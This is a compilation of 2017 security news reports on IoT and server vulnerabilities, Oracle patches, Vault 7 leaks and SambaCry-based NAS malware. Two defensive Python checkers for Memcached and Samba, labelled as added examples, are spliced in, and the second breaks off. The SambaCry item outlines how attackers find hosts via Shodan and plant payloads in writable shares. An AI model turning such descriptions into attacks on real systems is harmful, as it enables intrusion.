The clear unproven implication is that Russian state-backed actors are specifically targeting the western energy sector. Having said that, however, the Times report differs from the FBI/DHS and NCSC memos by stating that the intention was "to infiltrate control systems... This would also have given them the power to knock out parts of the grid in Northern Ireland."

Both the FBI/DHS and NCSC memos point to attacks against services organizations, indicating that in the UK and America, it is primarily the supply chain to the critical infrastructure that is being targeted. Indeed, the FBI/DHS statement comments, "There is no indication of a threat to public safety, as any potential impact appears to be limited to administrative and business networks."

So, apart from the Times report, this would appear to be a large-scale campaign designed to find ways to infiltrate the critical infrastructure rather than anything designed to damage the critical infrastructure. This is probably standard practice for most cyber-advanced nations -- ensuring they have the capacity to respond to a potential enemy if it ever becomes necessary.

The importance to an enemy and the potential danger to the critical infrastructure should not, however, be underestimated. A known and ready access route into, for example, the power grid, would be similar to having a nuclear deterrent primed and ready -- there is no intention to use it, but accidents can happen.

Neither the FBI/DHS nor the NCSC names the attackers. The NCSC clearly has suspects, since it recognizes the infrastructure used. The New York Times, however, implicates Russia. "Two people familiar with the investigation say that, while it is still in its early stages, the hackers' techniques mimicked those of the organization known to cybersecurity specialists as "Energetic Bear," the Russian hacking group that researchers have tied to attacks on the energy sector since at least 2012."


Rapid7 Acquires Security Orchestration and Automation Firm Komand

19.7.2017 securityweek  Security

Boston-based IT security and operations software maker Rapid7 (NASDAQ: RPD) on Tuesday announced that it has acquired security orchestration and automation firm Komand.

Founded in late 2015 by Jen Andre, who previously co-founded Threat Stack, Komand’s platform was designed to help security and IT teams automate repetitive tasks, which Rapid7 says will “help its customers reduce time to resolution, maximize resources, and overcome ecosystem complexity.”

Specifically, Rapid7 explained that Komand’s technology will expand Rapid7’s Insight platform’s ability to “empower lean security and IT teams to meaningfully increase productivity across their entire operation and reduce the time it takes to respond to an incident.”

Customers will now have the ability to automatically identify risks, respond to incidents, and address issues significantly faster and with less human intervention, Rapid7 says.

“The need for well-designed security and IT automation solutions is acute; resources are scarce, environments are becoming more complex, all while threats are increasing,” said Corey Thomas, president and CEO of Rapid7. “Security and IT solutions must evolve through context-driven automation, allowing cybersecurity and IT professionals to focus on more strategic activities.”

“We’ve been impressed by the technology developed by the Komand team and believe that together, we’ll be able to build solutions that make security and IT teams significantly more productive,” said Lee Weiner, chief product officer at Rapid7. “The complexity of today’s security and IT ecosystems have put security and IT operations teams at a significant disadvantage when they need to respond quickly. By developing contextualized automation technology, we’ll be able to cut back the time it takes to respond to an incident—when minutes can mean the difference between a minor issue and significant compromise or loss.”

Rapid7 cites use cases including automated risk remediation and patching, malware investigation and containment, and chat ops for responding to routine inquiries.

The terms of the acquisition were not disclosed, though Rapid7 said the purchase is not expected to have a material financial impact to its calculated billings, revenue, and non-GAAP earnings (loss) per share for calendar year 2017, as guided on May 9, 2017.

Both Rapid7 and Komand were Boston-based companies with offices just down the street from each other.

Komand announced in Jan. 2017 that it had closed a $1.25 million seed round of funding.

As part of the acquisition, 12 Komand employees have become employees of Rapid7.


Millions of IoT Devices Possibly Affected by 'Devil's Ivy' Flaw

19.7.2017 securityweek  Vulnerability

A vulnerability dubbed by researchers “Devil’s Ivy,” which exists in an open source library present in the products of many companies, could affect millions of security cameras and other Internet of Things (IoT) devices.

The flaw, a stack-based buffer overflow, was discovered by IoT security startup Senrio in a camera from Axis Communications, one of the world’s largest security camera manufacturers.

The weakness, tracked as CVE-2017-9765, can be exploited to cause a denial-of-service (DoS) condition and to execute arbitrary code. Senrio has published a technical advisory and a video showing how an attacker could exploit the flaw to hijack a security camera and gain access to its video feed.

“When exploited, [the vulnerability] allows an attacker to remotely access a video feed or deny the owner access to the feed,” Senrio said in a blog post. “Since these cameras are meant to secure something, like a bank lobby, this could lead to collection of sensitive information or prevent a crime from being observed or recorded.”

Axis has determined that the vulnerability impacts nearly 250 of its camera models and it has started releasing firmware updates that patch the bug. The company has notified its customers and partners of Devil’s Ivy.

An investigation revealed that the security hole was actually in gSOAP, a development toolkit that simplifies the use of XML in server and client web applications. gSOAP is used by most of the top Fortune 500 companies and its developer, Genivia, claims it has been downloaded more than one million times.

The library is also used by some members of the ONVIF Forum, an organization that focuses on standardizing IP connectivity for cameras and other physical security products. ONVIF was established by Axis, Bosch and Sony in 2008 and its current members also include Canon, Cisco, D-Link, Honeywell, Huawei, Netgear, Panasonic, Siemens and Toshiba.

Senrio believes the Devil’s Ivy vulnerability could affect tens of millions of systems to some degree. A Shodan search conducted by the company on July 1 uncovered nearly 15,000 Axis dome cameras accessible from the Internet.

However, Genivia, which provided patches and mitigations, believes the vulnerability is not easy to exploit for arbitrary code execution.

Axis also pointed out in its advisory that exploitation of the flaw for code execution requires a skilled and determined attacker. The hacker needs to have access to the network housing the vulnerable device, but products exposed to the Internet are at much higher risk.

Both Axis and Senrio have advised users to place their cameras and other IoT devices behind a firewall to reduce the risk of exploitation.


Oracle Patches Record-Breaking 308 Vulnerabilities in July Update

19.7.2017 securityweek  Vulnerability

Oracle on Tuesday released its July 2017 Critical Patch Update (CPU) to address a total of 308 vulnerabilities, the highest number of security fixes ever released in a quarter by the enterprise software giant.

This month’s CPU resolves security issues in 22 different Oracle products, including Oracle Database Server, Oracle Enterprise Manager, Oracle Fusion Middleware, Oracle Hyperion, Oracle E-Business Suite, Oracle Industry Applications (Communications, Retail, and Hospitality), Oracle Primavera, Oracle Sun Products, Oracle Java SE, and Oracle MySQL.

Of the total 308 vulnerabilities addressed, 27 were assessed as critical issues, with a CVSS base score between 9.0 and 10.0 (only one bug was rated 10). Over half of the vulnerabilities addressed this month can be exploited remotely without authentication.

Oracle Hospitality Applications received the largest number of security fixes, at 48 – 11 of these may be remotely exploitable without authentication. Oracle Fusion Middleware received 44 fixes (31 remotely exploitable without authentication), including one that addressed a critical vulnerability (CVE-2017-10137 – CVSS score 10.0) in Oracle WebLogic Server.

Oracle also resolved large numbers of vulnerabilities in Oracle Java SE (32 – 28 remotely exploitable without authentication), Oracle PeopleSoft Products (30 – 20 remotely exploitable), Oracle MySQL (30 – 9 remotely exploitable), Oracle E-Business Suite (22 – 18 remotely exploitable), and Oracle Financial Services Applications (20 – 4 remotely exploitable).

The record-breaking number of 30 flaws addressed in PeopleSoft is worrying, especially since 20 of the bugs can be exploited over the network without user credentials, notes ERPScan, a firm that specializes in securing SAP and Oracle software.

“Oracle PeopleSoft combines Supplier Relationship Management, Human Capital Management, Supply Chain Management, and other applications. The software has 6000+ enterprise customers and serves 20 million end users worldwide, including more than 800 universities. Over 1000 PeopleSoft systems are available on the Internet, putting organizations at risk. According to the latest survey from Crowd Research Partners, 89% of responders agreed that the number of cyber-attacks on ERP will significantly grow in the near future. SAP attacks may cost up to $50 million; PeopleSoft is definitely in the same weight category,” Alexander Polyakov, CTO at ERPScan, told SecurityWeek in an emailed statement.

82 of the vulnerabilities addressed in this quarter’s CPU affect a range of crucial business applications from Oracle, such as Oracle PeopleSoft, E-Business Suite, Siebel CRM, Oracle Financial Services, and Oracle Primavera Products Suite. Around 53% of these bugs can be exploited remotely without authentication.

One of the most important vulnerabilities in E-Business Suite (CVE-2017-10244) is an Information Disclosure issue that could allow an attacker “to exfiltrate sensitive business data without requiring a valid user account in the system,” Onapsis, the company that discovered the issue, reveals. The flaw affects all supported Oracle E-Business Suite versions: 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6.

“This vulnerability is especially critical as an attacker would only need a web browser and network access to the EBS system to perform it. Any number of critical documents could be stored in the system including invoices, purchase orders, HR information and design documents to start. Even systems in DMZ mode do not ensure these systems are not vulnerable,” Juan Perez-Etchegoyen, Onapsis CTO, said.

Other Oracle E-Business Suite flaws addressed this month include a path traversal vulnerability (CVE-2017-10192), multiple vulnerabilities that allow path traversal attacks (grouped in CVEs CVE-2017-10184 and CVE-2017-10186), two Denial of Service vulnerabilities (CVE-2017-10108 and CVE-2017-10109), a Multiple Cross Site Scripting vulnerability (CVE-2017-10180), two Cross Site Scripting vulnerabilities (CVE-2017-10185 and CVE-2017-10191) and an Information Disclosure vulnerability (CVE-2017-10245).

“There are different vulnerabilities which could be used by an attacker to compromise the system and get business critical information. It is crucial to update Oracle E-Business Suite with the last patch to fix all of these vulnerabilities and have the system up to date,” Onapsis says.

The most critical issues resolved in the Oracle July 2017 CPU affect Oracle WebLogic Server component of Oracle Fusion Middleware (CVE-2017-10137 – CVSS score 10.0), the OJVM component of Oracle Database Server (CVE-2017-10202 – CVSS score 9.9), the Oracle Communications BRM component of Oracle Communications Applications (CVE-2015-3253 – CVSS score 9.8), the MICROS PC Workstation 2015 component of Oracle Hospitality Applications (CVE-2017-5689 – CVSS score 9.8), and the MySQL Enterprise Monitor component of Oracle MySQL (CVE-2016-4436 – CVSS score 9.8).

Each quarter starting last year, Oracle has been patching an increasing number of vulnerabilities in its products. After the January 2016 CPU broke the 200 security patches barrier, the April 2017 one hit the 300 mark, and this month’s set of patches sets a new record.

As more and more security researchers focus on finding vulnerabilities in business software, the number of addressed issues is expected to increase. This should result in improved overall security for Oracle software, but only as long as patches are installed in a timely manner, which is a difficult and monotonous task, as ERPScan points out.


Mozilla Conducts Security Audit of Firefox Accounts

19.7.2017 securityweek  Security

Mozilla has asked Germany-based security firm Cure53 to conduct an audit of the Firefox Accounts system and researchers identified a total of 15 issues, including vulnerabilities rated critical and high severity.

Firefox Accounts, also known as FxA, is the system that allows Firefox users to access hosted services provided by Mozilla. Since the component represents Firefox’s central authentication service and it’s likely to be targeted by malicious actors, Mozilla has decided to have it tested.

Tests conducted by Cure53 researchers over a 30-day period in September and October 2016 led to the discovery of 15 issues, which include six vulnerabilities and nine general weaknesses.

The most serious of the flaws, rated critical, could have allowed hackers to launch cross-site scripting (XSS) and scriptless attacks in an effort to phish users or to steal sensitive information. However, Mozilla pointed out that exploitation of the flaw required registering a relier, a process that is not open to the public.

One of the high severity vulnerabilities found by Cure53 could have allowed arbitrary command execution if the attacker could determine the location for the execution of an application.

The list of high severity flaws also includes another XSS bug and an encryption weakness that may be exploited to increase the efficiency of brute-force attacks. The other problems identified by researchers have been classified as having low or medium severity.

Most of the vulnerabilities have been patched and Mozilla claimed that none of them had been exploited for malicious purposes and none of them put user data at risk.

“Given the amount of the audited code and the complexity of the project, this number of findings classifies as low and translates to an overall positive result of the investigation,” Cure53 said in its report. “Despite the fact that the tests were as thorough as possible on the codebase placed in scope, only a single ‘Critical’ finding was ultimately spotted. Even though this issue was discovered early on in the test, no major design issues were identified. Ultimately, the platform was perceived as rather robust and secured against a wide range of different attacks.”

In the past months, Mozilla commissioned audits for several pieces of software through its Secure Open Source (SOS) program, including for cURL, Dovecot and the Network Time Protocol (NTP).


2017 ICS Cyber Security Conference Call for Speakers Open Through August 15

19.7.2017 securityweek  ICS

Longest Running ICS/SCADA Cybersecurity Conference to take Place Oct. 23-26, 2017 at InterContinental Hotel Atlanta

The official Call for Papers (speakers) for SecurityWeek’s 2017 Industrial Control Systems (ICS) Cyber Security Conference, being held October 23 – 26, 2017 at the InterContinental Buckhead Atlanta, Georgia, USA is open through August 15, 2017.
As the original ICS/SCADA cyber security conference, the event is the largest and longest-running cyber security-focused event series for the industrial control systems sector. The conference caters to the energy, water, utility, chemical, transportation, manufacturing, and other industrial and critical infrastructure organizations.


With a 15-year history, the conference has proven to bring value to attendees through the robust exchange of technical information, actual incidents, insights, and best practices to help protect critical infrastructures from cyber-attacks.

Produced by SecurityWeek, the conference addresses ICS/SCADA topics including protection for SCADA systems, plant control systems, engineering workstations, substation equipment, programmable logic controllers (PLCs), and other field control system devices.

The Conference is unique and has historically focused on control system end-users from various industries and what cyber vulnerabilities mean to control system reliability and safe operation. It also has a long history of having discussions of actual ICS cyber incidents along with lessons learned.

The 2017 Conference is expected to attract more than 450 professionals from around the world, including large critical infrastructure and industrial organizations, military and state and Federal Government. The event incorporates training workshops and advanced full-day training sessions on various topics.

Through the Call for Speakers, a conference committee will accept speaker submissions for possible inclusion in the program at the 2017 ICS Cyber Security Conference.

The conference committee encourages proposals for both main track and “In Focus” sessions. Most sessions are 45 minutes in length including time for Q&A.

Submissions will be reviewed on an ongoing basis so early submission is highly encouraged.

Submissions must include proposed presentation title, an informative session abstract, including learning objectives for attendees if relevant; and contact information and bio for the proposed speaker.

All speakers must adhere to the 100% vendor neutral / no commercial policy of the conference. If speakers cannot respect this policy, they should not submit a proposal.

To be considered, interested speakers should submit proposals by email to events@securityweek.com with the subject line “ICS2017 CFP” by August 15, 2017.

Plan on Attending the 2017 ICS Cyber Security Conference?

Online registration is open, with discounts available for early registration.

Sponsorship Opportunities

Sponsorship and exhibitor opportunities for the 2017 ICS Cyber Security Conference are available. Please contact events(at)securityweek.com for information.

About the ICS Cyber Security conference

Produced by SecurityWeek, the ICS Cyber Security Conference is the conference where ICS users, ICS vendors, system security providers and government representatives meet to discuss the latest cyber-incidents, analyze their causes and cooperate on solutions. Since its first edition in 2002, the conference has attracted a continually rising interest as both the stakes of critical infrastructure protection and the distinctiveness of securing ICSs become increasingly apparent.


WikiLeaks Reveals CIA Teams Up With Tech to Collect Ideas For Malware Development
19.7.2017 thehackernews BigBrothers
As part of its ongoing Vault 7 leaks, the whistleblower organisation WikiLeaks today revealed details about a CIA contractor responsible for analysing advanced malware and hacking techniques being used in the wild by cyber criminals.
According to the documents leaked by WikiLeaks, Raytheon Blackbird Technologies, the Central Intelligence Agency (CIA) contractor, submitted nearly five such reports to CIA as part of UMBRAGE Component Library (UCL) project between November 2014 and September 2015.
These reports contain brief analysis of proof-of-concept ideas and malware attack vectors — publicly presented by security researchers and secretly developed by cyber espionage hacking groups.
Reports submitted by Raytheon were allegedly helping CIA's Remote Development Branch (RDB) to collect ideas for developing their own advanced malware projects.
It was also revealed in previous Vault 7 leaks that the CIA's UMBRAGE malware development teams also borrow code from publicly available malware samples to build their own spyware tools.
Here's the list and brief information of each report:
Report 1 — Raytheon analysts detailed a variant of the HTTPBrowser Remote Access Tool (RAT), which was probably developed in 2015.
The RAT, which is designed to capture keystrokes from the targeted systems, was being used by a Chinese cyber espionage APT group called 'Emissary Panda.'
Report 2 — This document details a variant of the NfLog Remote Access Tool (RAT), also known as IsSpace, which was being used by Samurai Panda, identified as another Chinese hacking group.
Equipped with Adobe Flash zero-day exploit CVE-2015-5122 (leaked in Hacking Team dump) and UAC bypass technique, this malware was also able to sniff or enumerate proxy credentials to bypass Windows Firewall.
Report 3 — This report contains details about "Regin" -- a very sophisticated malware sample that has been spotted in operation since 2013 and majorly designed for surveillance and data collection.
Regin is a cyber espionage tool, which is said to be more sophisticated than both Stuxnet and Duqu and is believed to be developed by the US intelligence agency NSA.
The malware uses a modular approach that allows an operator to enable customised spying capabilities. Regin's design makes the malware highly suited for persistent, long-term mass surveillance operations against targets.
Report 4 — It details a suspected Russian State-sponsored malware sample called "HammerToss," which was discovered in early 2015 and suspected of being operational since late 2014.
What makes HammerToss interesting is its architecture, which leverages Twitter accounts, GitHub accounts, compromised websites, and Cloud-storage to orchestrate command-and-control functions to execute the commands on the targeted systems.
Report 5 — This document details the self-code injection and API hooking methods of information stealing Trojan called "Gamker."
Gamker uses simple decryption, then drops a copy of itself using a random filename and injects itself into a different process. The trojan also exhibits other typical trojan behaviours.
Previous Vault 7 CIA Leaks
Last week, WikiLeaks revealed the CIA's Highrise project, which allowed the spying agency to stealthily collect and forward stolen data from compromised smartphones to its server through SMS messages.
Since March, the whistle-blowing group has published 17 batches of the "Vault 7" series, which include this week's and last week's leaks, along with the following batches:
BothanSpy and Gyrfalcon — two alleged CIA implants that allowed the spying agency to intercept and exfiltrate SSH credentials from targeted Windows and Linux operating systems using different attack vectors.
OutlawCountry – An alleged CIA project that allowed it to hack and remotely spy on computers running the Linux operating systems.
ELSA – the alleged CIA malware that tracks geo-location of targeted PCs and laptops running the Microsoft Windows operating system.
Brutal Kangaroo – A tool suite for Microsoft Windows used by the agency to target closed networks or air-gapped computers within an organisation or enterprise without requiring any direct access.
Cherry Blossom – An agency framework, basically a remotely controllable firmware-based implant, used for monitoring the Internet activity of the targeted systems by exploiting vulnerabilities in Wi-Fi devices.
Pandemic – A CIA project that allowed the agency to turn Windows file servers into covert attack machines that can silently infect other computers of interest inside a targeted network.
Athena – A CIA spyware framework that has been designed to take full control over infected Windows PCs remotely, and works against every version of Microsoft's Windows operating systems, from Windows XP to Windows 10.
AfterMidnight and Assassin – Two alleged CIA malware frameworks for the Microsoft Windows platform that have been designed to monitor and report back actions on the infected remote host computer and execute malicious actions.
Archimedes – Man-in-the-middle (MitM) attack tool allegedly created by the CIA to target computers inside a Local Area Network (LAN).
Scribbles – A piece of software allegedly designed to embed 'web beacons' into confidential documents, allowing the spying agency to track insiders and whistleblowers.
Grasshopper – Framework that allowed the spying agency to easily create custom malware for breaking into Microsoft's Windows and bypassing antivirus protection.
Marble – Source code of a secret anti-forensic framework, basically an obfuscator or a packer used by the CIA to hide the actual source of its malware.
Dark Matter – Hacking exploits the agency designed to target iPhones and Macs.
Weeping Angel – Spying tool used by the agency to infiltrate smart TVs, transforming them into covert microphones.
Year Zero – Alleged CIA hacking exploits for popular hardware and software.


Over 70,000 Memcached Servers Still Vulnerable to Remote Hacking
19.7.2017 thehackernews Vulnerability
Nothing in this world is fully secure, from our borders to cyberspace. I know vulnerabilities are bad, but the worst part comes in when people just don't care to apply patches on time.
Late last year, Cisco's Talos intelligence and research group discovered three critical remote code execution (RCE) vulnerabilities in Memcached that exposed major websites including Facebook, Twitter, YouTube, Reddit, to hackers.
Memcached is a popular open-source and easily deployable distributed caching system that allows objects to be stored in memory.
The Memcached application has been designed to speed up dynamic web applications (for example php-based websites) by reducing stress on the database that helps administrators to increase performance and scale web applications.
It's been almost eight months since the Memcached developers released patches for three critical RCE vulnerabilities (CVE-2016-8704, CVE-2016-8705 and CVE-2016-8706), but tens of thousands of servers running the Memcached application are still vulnerable, allowing attackers to steal sensitive data remotely.
Researchers at Talos conducted Internet scans on two different occasions, one in late February and another in July, to find out how many servers are still running the vulnerable version of the Memcached application.
And the results are surprising...
Results from February Scan:
Total servers exposed on the Internet — 107,786
Servers still vulnerable — 85,121
Servers still vulnerable but require authentication — 23,707
And the top 5 countries with most vulnerable servers are the United States, followed by China, United Kingdom, France and Germany.
Results from July Scan:
Total servers exposed on the Internet — 106,001
Servers still vulnerable — 73,403
Servers still vulnerable but require authentication — 18,012
After comparing results from both Internet scans, researchers learned that only 2,958 of the servers found vulnerable in the February scan had been patched before the July scan, while the remaining ones are still left vulnerable to remote attack.
Data Breach & Ransom Threats
This failure by organisations to apply patches on time is concerning, as Talos researchers warned that these vulnerable Memcached installations could be an easy target of ransomware attacks similar to the ones that hit MongoDB databases in late December.
Although unlike MongoDB, Memcached is not a database, it "can still contain sensitive information and disruption in the service availability would certainly lead to further disruptions on dependent services."
The flaws in Memcached could allow hackers to replace cached content with their malicious one to deface the website, serve phishing pages, ransom threats, and malicious links to hijack victim's machine, placing hundreds of millions of online users at risk.
"With the recent spate of worm attacks leveraging vulnerabilities this should be a red flag for administrators around the world," the researchers concluded.
"If left unaddressed the vulnerabilities could be leveraged to impact organisations globally and affect business severely. It is highly recommended that these systems be patched immediately to help mitigate the risk to organisations."
Customers and organisations are advised to apply the patch as soon as possible even to Memcached deployments in "trusted" environments, as attackers with existing access could target vulnerable servers to move laterally within those networks.
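An added inventory helper, not code from the article or from Cisco Talos, that checks Memcached servers the way the scans above do: it sends the text-protocol `version` command, parses the reply, sorts hosts into patched, vulnerable or unknown, and then compares two scan runs the way the February and July results are compared above. The article says patches exist but not which release carries them, so `PLACEHOLDER_MIN_PATCHED` is an obvious placeholder to replace with the fixed version from the Memcached release notes; the host replies are constructed, and `query_version` is the only part that touches the network.

```python
"""Version inventory for the unpatched-Memcached problem the article describes.

Added example, not code from the article or Cisco Talos. It speaks the Memcached
text protocol (the 'version' command) and compares each reply with a patched
version you take from the Memcached release notes: the threshold below is a
placeholder, because the article does not name the fixed release.
"""
import re
import socket

# PLACEHOLDER threshold for the demo only; not the real fixed release.
PLACEHOLDER_MIN_PATCHED = (1, 4, 30)
VERSION_RE = re.compile(rb"^VERSION (\d+)\.(\d+)\.(\d+)")


def parse_version_reply(reply):
    """b'VERSION 1.4.25' + CRLF -> (1, 4, 25); None for anything else (an error
    reply, another service on the port, or a server speaking only the binary protocol)."""
    m = VERSION_RE.match(reply)
    return tuple(int(g) for g in m.groups()) if m else None


def classify(version, min_patched):
    """'patched' / 'vulnerable' by upstream version number, 'unknown' if unparsable.
    Caveat: distribution builds may backport the fix under an older version number."""
    if version is None:
        return "unknown"
    return "patched" if version >= min_patched else "vulnerable"


def query_version(host, port=11211, timeout=3.0):
    """Ask a live Memcached instance for its version over the text protocol."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(b"version\r\n")
        return sock.recv(64)


def inventory(replies, min_patched):
    """{host: raw reply bytes} -> {host: classification}."""
    return {host: classify(parse_version_reply(raw), min_patched)
            for host, raw in replies.items()}


def compare_scans(earlier, later):
    """The article's two-scan comparison: for hosts vulnerable in the earlier scan,
    count how many are patched, still vulnerable, undeterminable or gone later."""
    counts = {"patched": 0, "still_vulnerable": 0, "unknown": 0, "gone": 0}
    for host, status in earlier.items():
        if status != "vulnerable":
            continue
        now = later.get(host)
        if now is None:
            counts["gone"] += 1
        elif now == "vulnerable":
            counts["still_vulnerable"] += 1
        elif now == "patched":
            counts["patched"] += 1
        else:
            counts["unknown"] += 1
    return counts


# Constructed replies standing in for two scan runs; no live host is contacted.
FEB_REPLIES = {
    "10.0.0.1": b"VERSION 1.4.25\r\n",
    "10.0.0.2": b"VERSION 1.4.25\r\n",
    "10.0.0.3": b"VERSION 1.4.39\r\n",
    "10.0.0.4": b"ERROR\r\n",
}
JUL_REPLIES = {
    "10.0.0.1": b"VERSION 1.4.39\r\n",
    "10.0.0.2": b"VERSION 1.4.25\r\n",
    "10.0.0.3": b"VERSION 1.4.39\r\n",
}


def demo():
    """Run both constructed scans through the classifier and compare them."""
    feb = inventory(FEB_REPLIES, PLACEHOLDER_MIN_PATCHED)
    jul = inventory(JUL_REPLIES, PLACEHOLDER_MIN_PATCHED)
    return compare_scans(feb, jul)


if __name__ == "__main__":
    print(demo())  # {'patched': 1, 'still_vulnerable': 1, 'unknown': 0, 'gone': 0}
```

The classification is by upstream version number only, which is also the limit of what an Internet scan can tell: a server whose distribution backported the fix will show an old number and be counted as vulnerable, so a False here is a prompt to check the vendor advisory, and a server that answers with authentication demanded or an error lands in "unknown" rather than being counted as safe.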


Remotely Exploitable Flaw Puts Millions of Internet-Connected Devices at Risk
19.7.2017 thehackernews Vulnerability
Security researchers have discovered a critical remotely exploitable vulnerability in an open-source software development library used by major manufacturers of Internet-of-Things devices, leaving millions of devices vulnerable to hacking.
The vulnerability (CVE-2017-9765), discovered by researchers at the IoT-focused security firm Senrio, resides in the software development library called gSOAP toolkit (Simple Object Access Protocol) — an advanced C/C++ auto-coding tool for developing XML Web services and XML applications.
Dubbed "Devil's Ivy," the stack buffer overflow vulnerability allows a remote attacker to crash the SOAP WebServices daemon and could be exploited to execute arbitrary code on the vulnerable devices.

The Devil's Ivy vulnerability was discovered by researchers while analysing an Internet-connected security camera manufactured by Axis Communications.
"When exploited, it allows an attacker to remotely access a video feed or deny the owner access to the feed," researchers say.
"Since these cameras are meant to secure something, like a bank lobby, this could lead to collection of sensitive information or prevent a crime from being observed or recorded."
Axis confirmed the vulnerability that exists in almost all of its 250 camera models (you can find the complete list of affected camera models here) and has quickly released patched firmware updates on July 6th to address the vulnerability, prompting partners and customers to upgrade as soon as possible.
However, researchers believe that their exploit would work on internet-connected devices from other vendors as well, as the affected software is used by Canon, Siemens, Cisco, Hitachi, and many others.
Axis immediately informed Genivia, the company that maintains gSOAP, about the vulnerability and Genivia released a patch on June 21, 2017.
The company also reached out to electronics industry consortium ONVIF to ensure all of its members, including Canon, Cisco, and Siemens, those who make use of gSOAP become aware of the issue and can develop patches to fix the security hole.
Internet of Things (IoT) devices have always been the weakest link and, therefore, an easy entry point for hackers into otherwise secured networks. So it is always advisable to keep your Internet-connected devices updated and away from the public Internet.


New Linux Malware Exploits SambaCry Flaw to Silently Backdoor NAS Devices
19.7.2017 thehackernews Vulnerability
Remember SambaCry?
Almost two months ago, we reported about a 7-year-old critical remote code execution vulnerability in the Samba networking software, allowing a hacker to remotely take full control of vulnerable Linux and Unix machines.
We dubbed the vulnerability as SambaCry, because of its similarities to the Windows SMB vulnerability exploited by the WannaCry ransomware that wreaked havoc across the world over two months ago.
Despite being patched in late May, the vulnerability is currently being leveraged by a new piece of malware to target the Internet of Things (IoT) devices, particularly Network Attached Storage (NAS) appliances, researchers at Trend Micro warned.
For those unfamiliar: Samba is open-source software (re-implementation of SMB/CIFS networking protocol), which offers Linux/Unix servers with Windows-based file and print services and runs on the majority of operating systems, including Linux, UNIX, IBM System 390, and OpenVMS.
Shortly after the public revelation of its existence, the SambaCry vulnerability (CVE-2017-7494) was exploited mostly to install cryptocurrency mining software—"CPUminer" that mines "Monero" digital currency—on Linux systems.
However, the latest malware campaign involving SambaCry spotted by researchers at Trend Micro in July mostly targets NAS devices used by small and medium-size businesses.
SHELLBIND Malware Exploits SambaCry to Target NAS Devices
Dubbed SHELLBIND, the malware works on various architectures, including MIPS, ARM and PowerPC, and is delivered as a shared object (.SO) file to Samba public folders and loaded via the SambaCry vulnerability.
Once deployed on the targeted machine, the malware establishes communication with the attackers' command and control (C&C) server located in East Africa, and modifies firewall rules to ensure that it can communicate with its server.
After successfully establishing a connection, the malware grants the attackers access to the infected device and provides them with an open command shell in the device, so that they can issue any number and type of system commands and eventually take control of the device.
In order to find affected devices that use Samba, attackers can use the Shodan search engine to locate them and then write the malware files to their public folders.
"It is quite easy to find devices that use Samba in Shodan: searching for port 445 with a 'samba' string will turn up a viable IP list," researchers said while explaining the flaw.
"An attacker would then simply need to create a tool that can automatically write malicious files to every IP address on the list. Once they write the files into the public folders, the devices with the SambaCry vulnerability could become ELF_SHELLBIND.A victims."
However, it is not clear what the attackers do with the compromised devices and what's their actual motive behind compromising the devices.
The SambaCry vulnerability is trivially easy to exploit and could be used by remote attackers to upload a shared library to a writable share and then cause the server to load and execute the malicious code.
The maintainers of Samba already patched the issue in Samba versions 4.6.4/4.5.10/4.4.14, so you are advised to patch your systems against the vulnerability as soon as possible.
Just make sure that your system is running an updated Samba version.
Also, attackers need to have writable access to a shared location on the target system to deliver the payload, which is another mitigating factor that might lower the rate of infection.
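Added example code for defenders, not from the article, Trend Micro or the Samba project, covering the three points above: it compares the `smbd --version` number with the patched releases the article lists (4.6.4 / 4.5.10 / 4.4.14), checks an smb.conf for guest-writable shares and for the `nt pipe support = no` workaround documented in the Samba advisory (an assumption outside this article), and scans a share directory for dropped ELF objects, since SHELLBIND arrives as a shared object in a writable folder. The sample smb.conf and the ELF-looking file are constructed for the demonstration.

```python
# Added example for defenders; not code from the article, Trend Micro or Samba.
# Assumes the patched releases the article lists (4.6.4 / 4.5.10 / 4.4.14) and
# the 'nt pipe support = no' workaround from the Samba advisory (not in the article).
import os
import re
import tempfile

PATCHED_BY_MINOR = {4: 14, 5: 10, 6: 4}   # first fixed release per 4.x branch (article)
ELF_MAGIC = b"\x7fELF"
_TRUE, _FALSE = {"yes", "true", "1"}, {"no", "false", "0"}

def parse_version(text):
    """(major, minor, patch) from `smbd --version` output like 'Version 4.4.13-Ubuntu'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(x) for x in m.groups()) if m else None

def upstream_version_patched(version):
    """True when the upstream number carries the fix. Distributions backport fixes
    without changing the version, so False means 'check the vendor advisory'."""
    major, minor, patch = version
    if (major, minor) > (4, 6):
        return True                                   # branches released after the fix
    fixed = PATCHED_BY_MINOR.get(minor) if major == 4 else None
    return fixed is not None and patch >= fixed       # 3.x and 4.0-4.3: no listed fix

def parse_smb_conf(text):
    """Minimal smb.conf reader; parameter names are case- and whitespace-insensitive,
    so 'Read Only' and 'readonly' become the same key."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][re.sub(r"\s+", "", key).lower()] = value.strip().lower()
    return sections

def is_writable(share):
    """Shares are read-only unless 'read only = no' or 'writable/writeable = yes'."""
    if share.get("readonly") in _FALSE:
        return True
    return share.get("writable", share.get("writeable")) in _TRUE

def assess_config(text):
    """Shares a guest could drop a file into, plus whether the workaround is set."""
    conf = parse_smb_conf(text)
    mitigated = conf.get("global", {}).get("ntpipesupport") in _FALSE
    guest_writable = sorted(
        name for name, share in conf.items()
        if name != "global" and is_writable(share)
        and (share.get("guestok") in _TRUE or share.get("public") in _TRUE))
    return {"nt_pipe_support_disabled": mitigated, "guest_writable_shares": guest_writable}

def find_elf_files(root):
    """Relative paths under root whose first bytes are the ELF magic: SHELLBIND arrives
    as an ELF shared object, so one sitting in a document share deserves a look."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    if fh.read(4) == ELF_MAGIC:
                        hits.append(os.path.relpath(path, root))
            except OSError:
                continue
    return sorted(hits)

# Constructed sample configuration, not taken from any real deployment.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   ; nt pipe support = no     <- workaround left commented out on purpose
[public]
   path = /srv/samba/public
   guest ok = yes
   read only = no
[docs]
   path = /srv/samba/docs
   writable = yes
   valid users = @staff
"""

def demo_share_scan():
    """Scan a throwaway directory holding one constructed ELF-looking file and one
    text file; returns the flagged relative paths."""
    with tempfile.TemporaryDirectory() as share:
        with open(os.path.join(share, "x.so"), "wb") as fh:
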